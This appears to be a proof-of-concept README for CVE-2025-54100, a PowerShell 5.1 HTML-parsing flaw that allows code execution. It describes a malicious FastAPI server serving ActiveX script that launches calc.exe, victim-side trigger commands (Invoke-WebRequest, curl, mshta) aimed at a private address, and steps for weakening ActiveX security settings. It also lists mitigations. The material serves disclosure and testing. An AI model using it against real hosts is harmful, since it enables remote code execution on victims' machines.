## https://sploitus.com/exploit?id=E6A77F14-6854-5CBA-865D-1BBEED3DE166
# CVE-2025-54100 ā PowerShell Response Parsing PoC
Demonstrates how **CVE-2025-54100** can lead to **remote code execution (RCE)** in **Windows PowerShell 5.1** through malicious HTML parsing. ## Overview
- [What is CVE-2025-54100?](#what-is-cve-2025-54100)
- [How the PoC works](#how-the-poc-works)
- [Quick start](#quick-start)
- [Triggering from a victim host](#triggering-from-a-victim-host)
- [Troubleshooting & verification](#troubleshooting--verification)
- [Evidence](#evidence)
- [Mitigation](#mitigation)
- [Disclaimer](#disclaimer)
- [References](#references)
## What is CVE-2025-54100?
**Vulnerability type:** Command injection risk exists when `Invoke-WebRequest` does not use the `-UseBasicParsing` parameter.
**Criticality:** CVSS 7.8 (High Risk)
**Root cause:** MSHTML-based HTML response parsing allows script execution (e.g., `ActiveXObject`) and runs within the callerās context.
**Affected systems:**
- Windows 10 / 11
- Windows Server 2008ā2025
- PowerShell 5.1
## How the PoC works
1. The FastAPI server in `CVE-2025-54100.py` returns a carefully crafted HTML payload.
2. The script in the HTML attempts to instantiate ActiveX objects like `WScript.Shell` or `Shell.Application`.
3. On a vulnerable system, the MSHTML parser executes the script, demonstrating remote code execution by launching `calc.exe`.
4. The provided payload is **minimized and non-destructive**; itās used solely for research and verification purposes. It can be expanded for further analysis as needed.
## Quick start
### Environment requirements
- Python 3.10+ (tested in FastAPI and Uvicorn environments)
- Install dependencies:
```bash
python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt
```
### Running the malicious server
Start the PoC HTTP service:
```bash
uvicorn app:app --host 0.0.0.0 --port 8888 --reload
```
## Triggering from a victim host
On a **vulnerable Windows host**, **do not use** `-UseBasicParsing`. Execute the following commands:
```powershell
# Invoke-WebRequest
Invoke-WebRequest -Uri "http://192.168.26.16:8888"
# curl (alias in PowerShell)
curl http://192.168.26.16:8888
# mshta
mshta http://192.168.26.16:8888
```
Ensure the port matches the server configuration. If the system is vulnerable, the embedded script will be executed by the MSHTML parser. > Note: Some antivirus software may block this behavior, even if the parsing vulnerability itself remains exploitable.
## Troubleshooting and verification
1. If `calc.exe` does not pop up:
1. Open **Internet Options** on the victim host.
2. Go to **Security ā Custom Levels**.
3. Enable **āInitialize and Scriptize Unsafe ActiveX Controlsā**.
4. Re-execute `Invoke-WebRequest` without using `-UseBasicParsing`.
This step is used to verify the execution vector. In real attacks, attackers may use obfuscation or bypass techniques to circumvent default security restrictions.
## Verifying evidence

## Mitigations
Microsoft has patched this vulnerability **in December 2025**:
1. Install Windows security updates promptly.
2. **Always use `-UseBasicParsing`** to avoid MSHTML parsing:
```powershell
Invoke-WebRequest -Uri "http://:8888" -UseBasicParsing
```
3. Migrate to PowerShell 7+ (pwsh). PowerShell Core no longer relies on MSHTML for parsing, thereby avoiding this issue architecturally.
## References
- [NVD: CVE-2025-54100](https://nvd.nist.gov/vuln/detail/CVE-2025-54100)
- [MSRC: Update Guide](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54100)
- [GitHub: osman1337-security/CVE-2025-54100](https://github.com/osman1337-security/CVE-2025-54100)